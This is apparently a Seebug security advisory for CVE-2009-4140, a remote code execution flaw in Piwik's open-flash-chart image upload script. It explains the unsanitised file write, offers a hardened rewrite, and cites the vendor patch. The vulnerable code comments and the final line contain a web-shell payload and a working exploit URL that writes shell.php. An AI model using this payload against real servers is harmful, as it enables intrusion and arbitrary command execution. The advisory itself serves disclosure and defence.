Piwik ofc_upload_image.php Remote PHP Code Execution Vulnerability

2009-12-25T00:00:00
ID SSV:15141
Type seebug
Reporter Root
Modified 2009-12-25T00:00:00

Description

BUGTRAQ ID: 37314
CVE(CAN) ID: CVE-2009-4140

Piwik is an open-source web analytics system built on PHP and MySQL.

Piwik uses the open-flash-chart module for charting. This module does not properly sanitise the name and HTTP_RAW_POST_DATA parameters submitted to the ofc_upload_image.php file before using them to create a file:

<?
$default_path = '../tmp-upload-images/';
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
$destination = $default_path . basename( $_GET[ 'name' ] ); // This should be sanitised before use.

echo 'Saving your image to: '. $destination; // and it tells us where it's saving it to, sigh.

$jfh = fopen($destination, 'w') or die("can't open file"); // The vulnerable code is right here.
fwrite($jfh, $HTTP_RAW_POST_DATA);               // and here, <?phpinfo();?>, <?system($_GET['cmd']);?>
fclose($jfh);

?>

When register_globals is enabled, an authenticated remote attacker can upload a file with a PHP extension and then access it by directly requesting tmp-upload-images/, resulting in arbitrary code execution.
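For comparison, a hardened form of the same upload handler, written here as an added example (not the code of Piwik or open-flash-chart; the upload directory location, size limit and allowed extensions are assumptions). It removes the two defects above: the file name is validated against a whitelist of image names instead of being passed straight to fopen(), and the request body is read explicitly from php://input so that nothing depends on register_globals or $HTTP_RAW_POST_DATA.

```php
<?php
// Added example, not part of Piwik or open-flash-chart. Paths, limits and
// the extension whitelist are assumptions chosen for illustration.

// Accept only a bare file name of safe characters with an image extension.
function safe_upload_name(string $name): ?string {
    $name = basename($name);                       // drop any directory component
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.(png|jpe?g|gif)$/i', $name)) {
        return null;                               // rejects shell.php, "../x", empty names
    }
    return $name;
}

$upload_dir = __DIR__ . '/../tmp-upload-images/';  // assumed location
if (!is_dir($upload_dir) && !mkdir($upload_dir, 0750, true)) {
    http_response_code(500);
    exit('upload directory unavailable');
}

$name = safe_upload_name($_GET['name'] ?? '');
if ($name === null) {
    http_response_code(400);
    exit('invalid file name');
}

// Read the body explicitly; never rely on register_globals / $HTTP_RAW_POST_DATA.
$body = file_get_contents('php://input');
$max  = 2 * 1024 * 1024;                           // assumed 2 MiB limit
if ($body === false || $body === '' || strlen($body) > $max) {
    http_response_code(400);
    exit('invalid image body');
}

// Require the content to parse as an image before anything is written (PHP >= 5.4).
if (@getimagesizefromstring($body) === false) {
    http_response_code(400);
    exit('not an image');
}

if (file_put_contents($upload_dir . $name, $body, LOCK_EX) === false) {
    http_response_code(500);
    exit('write failed');
}
echo 'Image saved';                                // do not echo the server path back
```

Independently of the PHP checks, the web server should be configured so that nothing under tmp-upload-images/ is ever executed as a script, so that a bypass of the name filter still cannot lead to code execution.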

Piwik 0.2.35 - 0.4.3

Vendor patch:

Piwik

The vendor has released an upgrade patch that fixes this security issue; please download it from the vendor's homepage:

http://piwik.org/blog/2009/10/piwik-response-to-secunia-advisory-sa37078/

./libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?>